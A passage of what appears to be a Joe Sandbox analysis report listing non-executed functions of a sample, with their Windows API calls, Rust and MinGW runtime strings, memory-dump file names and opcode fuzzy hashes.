Instruction Fuzzy Hash: 3FE0229270465493AC088F2B9E4004C9BA1BB0AFD039488A1DF0C6BF11CF38C5E39300

Non-executed Functions

Function 00BA2E10 Relevance: 12.0, APIs: 8, Instructions: 50COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00BA2E24
RtlLookupFunctionEntry.KERNEL32 ref: 00BA2E3B
RtlVirtualUnwind.KERNEL32 ref: 00BA2E7D
SetUnhandledExceptionFilter.KERNEL32 ref: 00BA2EC1
UnhandledExceptionFilter.KERNEL32 ref: 00BA2ECE
GetCurrentProcess.KERNEL32 ref: 00BA2ED4
TerminateProcess.KERNEL32 ref: 00BA2EE2
abort.MSVCRT ref: 00BA2EE8

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
String ID:
API String ID: 4278921479-0
Opcode ID: 29e65a1842ae0c480ea10587979510cacfd26ebae216b08e15be02510e6e64d0
Instruction ID: 8643e508a7dc927ba6b41a01933403c57f498dd170b7e379acef29de14f3e748
Opcode Fuzzy Hash: 29e65a1842ae0c480ea10587979510cacfd26ebae216b08e15be02510e6e64d0
Instruction Fuzzy Hash: 8F211035A11F04AAFB109F69F88438933A8F70AB84F800226DA8E53724EFB8C255C350

Function 00B7D4B0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 337windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00B7D4ED
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00B7D11C), ref: 00B7D54C
memcpy.MSVCRT ref: 00B7D5CA

Strings

NTDLL.DLL, xrefs: 00B7D4FF
assertion failed: self.is_char_boundary(new_len)/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b\library\alloc\src\string.rs, xrefs: 00B7DA0C

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: FormatMessagememcpymemset
String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b\library\alloc\src\string.rs
API String ID: 2872659494-3982518490
Opcode ID: 643585feb79c3478ee28cd302294b6c35d0262f3dffedde0363ea64798463dc3
Instruction ID: c338f0bfc54bfba622d497614d16a4846f1976f9fbc28c40cd385e3facb7d89c
Opcode Fuzzy Hash: 643585feb79c3478ee28cd302294b6c35d0262f3dffedde0363ea64798463dc3
Instruction Fuzzy Hash: 46D1CC32215AC289EB358F25D9407FD2BA1FB457C8F848176DA6E0BF89DF788245E340

Function 00B89E60 Relevance: 5.2, APIs: 4, Instructions: 225COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00B89F25
memcpy.MSVCRT ref: 00B89F8B
memcpy.MSVCRT ref: 00B89FE6
memcpy.MSVCRT ref: 00B8A04A

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: a39c0183ff7b056c203547cf7bddd3618d377d9b3e928647f0fc6173ce18ed73
Instruction ID: 8ed71f468362464181e210acded564a111f869befcc316b030502c4ea9a378a0
Opcode Fuzzy Hash: a39c0183ff7b056c203547cf7bddd3618d377d9b3e928647f0fc6173ce18ed73
Instruction Fuzzy Hash: 1C919962305B909AEB48EF66A8403AD77E4F709B88F48856AEF9D57B55DF34D4A0C300

Function 00B9C650 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 325COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00B9C80A
GetFullPathNameW.KERNEL32 ref: 00B9C81F
GetLastError.KERNEL32 ref: 00B9C82A
GetLastError.KERNEL32 ref: 00B9C843

Strings

appdata, xrefs: 00B9C653
\\?\\\?\UNC\, xrefs: 00B9C8B7

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: ErrorLast$FullNamePath
String ID: \\?\\\?\UNC\$appdata
API String ID: 2482867836-3357109634
Opcode ID: db9139a5b54f316676feeaf5c6dd963c510de4c2574a4cc0f1f758acdbbabd93
Instruction ID: 796c0839ed712cc9057004085d90a358e9128ddcffa2f3672ac5b296a64a0081
Opcode Fuzzy Hash: db9139a5b54f316676feeaf5c6dd963c510de4c2574a4cc0f1f758acdbbabd93
Instruction Fuzzy Hash: 85C1BD62600BD486CF359F65D4983B93BE8F305BD8F9085A6EE595B799DF38CA81C300

Function 00BA2630 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00BA2703
abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00B7A71B), ref: 00BA2709
RtlUnwindEx.KERNEL32 ref: 00BA2818

Strings

CCG", xrefs: 00BA2691
CCG!, xrefs: 00BA2659
CCG , xrefs: 00BA269D
CCG!, xrefs: 00BA26F1

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3707373406
Opcode ID: 34dc56733007f9fd3c55d28220b4e5370bce957e66330a88e271d286e1120c74
Instruction ID: 3ede87d67d2f83ddeb2c6c40e174e276a71f9baa8b0cf53b7dfb425ef3b5a5fc
Opcode Fuzzy Hash: 34dc56733007f9fd3c55d28220b4e5370bce957e66330a88e271d286e1120c74
Instruction Fuzzy Hash: 0B516976219B80C6C7208F59E8807AE73B5F38AB98F644116EF8E43B18CF39C991C740

Function 00B7CA20 Relevance: 12.7, APIs: 10, Instructions: 181COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00B7CA70
TlsSetValue.KERNEL32 ref: 00B7CA81
TlsGetValue.KERNEL32 ref: 00B7CAD0
TlsSetValue.KERNEL32 ref: 00B7CAE1
TlsGetValue.KERNEL32 ref: 00B7CB30
TlsSetValue.KERNEL32(?), ref: 00B7CB41
TlsGetValue.KERNEL32 ref: 00B7CB90
TlsSetValue.KERNEL32(?,?), ref: 00B7CBA1
TlsGetValue.KERNEL32 ref: 00B7CBDC
TlsSetValue.KERNEL32(?,?), ref: 00B7CBED

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7851064097a3cfe09f52e595153435b02b94279ce94f90271a7570efdee0cb97
Instruction ID: c6e432e434c517f9f2c3a46247330212149346c0656f8c6f0eb266e830dc68c1
Opcode Fuzzy Hash: 7851064097a3cfe09f52e595153435b02b94279ce94f90271a7570efdee0cb97
Instruction Fuzzy Hash: 5D519222706A948BDB2A9F26565137D6BE1EB46F80F0DD0ADDF2E17345DB38DC818384

Function 00BA30F0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 185COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00BA3209

Strings

Address %p has no image-section, xrefs: 00BA3160
VirtualQuery failed for %d bytes at address %p, xrefs: 00BA335B
Mingw-w64 runtime failure:, xrefs: 00BA3128
VirtualProtect failed with code 0x%x, xrefs: 00BA32F6

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: ae1c215c02d1b970cd01d8be6aefa92eb4b93aea2c60055b4fe325c5fc9b605d
Instruction ID: 27a45e3b930b4e9947255059ccf012e3993e4c63198c7c96527a8662c8817d95
Opcode Fuzzy Hash: ae1c215c02d1b970cd01d8be6aefa92eb4b93aea2c60055b4fe325c5fc9b605d
Instruction Fuzzy Hash: 8051E072705B4096DB108F59F884799B7E0FB9AFA4F588225FFA903390EB78C685C300

Function 00B9C020 Relevance: 9.2, APIs: 6, Instructions: 173COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B7FE45), ref: 00B9C236
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B7FE45), ref: 00B9C251
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B7FE45), ref: 00B9C264

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: ErrorLast$CloseHandle
String ID:
API String ID: 3463825546-0
Opcode ID: cddee2f21e29cf423b486a8f27a85187065b7977aef0d6eeede48e089fd64c65
Instruction ID: dd64c09dac92c18355acaf46389804fc113f2828338dc8ed737e76fb06be7510
Opcode Fuzzy Hash: cddee2f21e29cf423b486a8f27a85187065b7977aef0d6eeede48e089fd64c65
Instruction Fuzzy Hash: 4C5148627042A097FF25876596503AE2FE0F3497D4F1442B1CF8A57BC6DB78C8A5C304

Function 00B7FDF0 Relevance: 9.1, APIs: 6, Instructions: 147fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 00B7FF86
MapViewOfFile.KERNEL32 ref: 00B7FFA6
CloseHandle.KERNEL32 ref: 00B7FFB1
CloseHandle.KERNEL32 ref: 00B7FFDA
CloseHandle.KERNEL32 ref: 00B7FFF0

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: CloseHandle$File$CreateMappingView
String ID:
API String ID: 1771758222-0
Opcode ID: 6d23f2a262bb6bcd81b6c59ee033bbabfd0b3d40b67309b0f854d42c6b8bc101
Instruction ID: 9c86c1160839b1fe0a3b058857370b6aa293b57b6c0a8788ca5dda62a2247c18
Opcode Fuzzy Hash: 6d23f2a262bb6bcd81b6c59ee033bbabfd0b3d40b67309b0f854d42c6b8bc101
Instruction Fuzzy Hash: 7851CA22715B5185EB24DB66E46876E27E0FB8AB88F18C069DF5D0BB46DF3CC486C304

Function 00BA3980 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00BA3A2A

Strings

CCG , xrefs: 00BA3996

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: b2c6dc9096ae1f9aa773ffe311f885973a27ba10920ca0db3dbc828a38cb8965
Instruction ID: 431169df27b6bcddf8961a5413b4daf6f3559d6736849da0781969a8525ec035
Opcode Fuzzy Hash: b2c6dc9096ae1f9aa773ffe311f885973a27ba10920ca0db3dbc828a38cb8965
Instruction Fuzzy Hash: 9E219F6170C54046EB2852A9949233E24C1DB8BB74F294B96F57E833E4DBAACEC5C302

Function 00B9CD20 Relevance: 7.7, APIs: 5, Instructions: 214COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00B9CE8A
GetEnvironmentVariableW.KERNEL32 ref: 00B9CE9C
GetLastError.KERNEL32 ref: 00B9CEA8
GetLastError.KERNEL32 ref: 00B9CEC1

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: ErrorLast$EnvironmentVariable
String ID:
API String ID: 2691138088-0
Opcode ID: 8abd1b96f6ffbdccb99d18eedcbe15bbc4f4e10eb1b0d5ca2c732887a0dbb931
Instruction ID: 22096ea5f4b867c31d32e40a63491555c965a2d6565c36c0cc4fb3225757ec96
Opcode Fuzzy Hash: 8abd1b96f6ffbdccb99d18eedcbe15bbc4f4e10eb1b0d5ca2c732887a0dbb931
Instruction Fuzzy Hash: A881A922600BC186DF359F66D8653AD27A9F785BC8F548176DE1A5BB89CF38C6868300

Function 00B7C560 Relevance: 7.6, APIs: 6, Instructions: 115COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00B7C582
TlsGetValue.KERNEL32 ref: 00B7C5D2
TlsSetValue.KERNEL32(?,?,00000000,?,00B7C741), ref: 00B7C5E2
TlsGetValue.KERNEL32 ref: 00B7C64F
TlsGetValue.KERNEL32 ref: 00B7C683
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,00B7C741), ref: 00B7C693

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 99e938f35e75f1123f06c4c3ef08b1909fb78fbdce6a07cae48cacdb26139bc9
Instruction ID: 74952ffe8aafaa9258e3eb5070694927ac2a74fe1a106502792f9b4ffac39188
Opcode Fuzzy Hash: 99e938f35e75f1123f06c4c3ef08b1909fb78fbdce6a07cae48cacdb26139bc9
Instruction Fuzzy Hash: 443146227056504ADE392B169A8133E6AD1E789FD0F4CC4BE9E1D47781DF7CDC418380

Function 00BA2D30 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00BA2D75
GetCurrentProcessId.KERNEL32 ref: 00BA2D80
GetCurrentThreadId.KERNEL32 ref: 00BA2D88
GetTickCount.KERNEL32 ref: 00BA2D90
QueryPerformanceCounter.KERNEL32 ref: 00BA2D9E

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 717ecaf089a558b5f8164dbedcdfa976f3d2edc265b87dce1c386dab7944ac34
Instruction ID: c04b724e01c2e3471ee28be355b75ac506dda63291af1970bcc6dc09b5c8a7bf
Opcode Fuzzy Hash: 717ecaf089a558b5f8164dbedcdfa976f3d2edc265b87dce1c386dab7944ac34
Instruction Fuzzy Hash: A411A066B66B1046FB208B25F80432573A0B749BB1F4816759E9D03BA4EB7CC985C300

Function 00B73DD0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 188COMMON

Download Yara Rule

Strings

}0x, xrefs: 00B74044
ParseIntError, xrefs: 00B73FDA
kindmessageKindErrorCustomerror (os error ), xrefs: 00B74001

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID:
String ID: }0x$ParseIntError$kindmessageKindErrorCustomerror (os error )
API String ID: 0-1900568752
Opcode ID: 87f27eb610d10f7b54759e6b5760645ba624286ce07e0f9d469741830788810a
Instruction ID: 82fdb345e6be50dd4a665007ace7ebe0c92bcd2d0336e7b156f075ac27389151
Opcode Fuzzy Hash: 87f27eb610d10f7b54759e6b5760645ba624286ce07e0f9d469741830788810a
Instruction Fuzzy Hash: 1951E1A2B14AA49AEB148F61D8407E93BF5F345FC8F44816AEF5D1BB04CB34CA96D300

Function 00BA28B0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00BA2935
RtlUnwindEx.KERNEL32 ref: 00BA2953
abort.MSVCRT ref: 00BA2959
abort.MSVCRT ref: 00BA2970

Part of subcall function 00BA2850: RaiseException.KERNEL32 ref: 00BA289B

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: abort$CaptureContextExceptionRaiseUnwind
String ID:
API String ID: 4122134289-0
Opcode ID: 2d41799b5a6f560282747668a07ab79b69b94f7653e47878a1b2f2c31c0c17ba
Instruction ID: f8aa1b8296a22305ebc72019cc81d855658c06571276e51b15ba5c523c204f22
Opcode Fuzzy Hash: 2d41799b5a6f560282747668a07ab79b69b94f7653e47878a1b2f2c31c0c17ba
Instruction Fuzzy Hash: F0114872618B8886DB609F69E84039AB7A5F38DBD4F540126EF8D03B58CF78C155CB10

Function 00BA3370 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00BA3648
Unknown pseudo relocation bit size %d., xrefs: 00BA3634

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 0-395989641
Opcode ID: 5e19c8390051cb2784b4b55d448f8d48a09f4e2bb34c71610d91828d2c3b458c
Instruction ID: 28e7a8314a07dc914156886c2282237e7b874d1315a6d57cf2d4fc9c6a88fbc9
Opcode Fuzzy Hash: 5e19c8390051cb2784b4b55d448f8d48a09f4e2bb34c71610d91828d2c3b458c
Instruction Fuzzy Hash: AC710272B18B8486DB10CF69E84079DB7E1FB1AFA8F588215EE1917798EB39C640C700

Function 00BA007E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32 ref: 00BA0096
CloseHandle.KERNEL32 ref: 00BA009E

Strings

s [... omitted frame ...], xrefs: 00BA021B

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
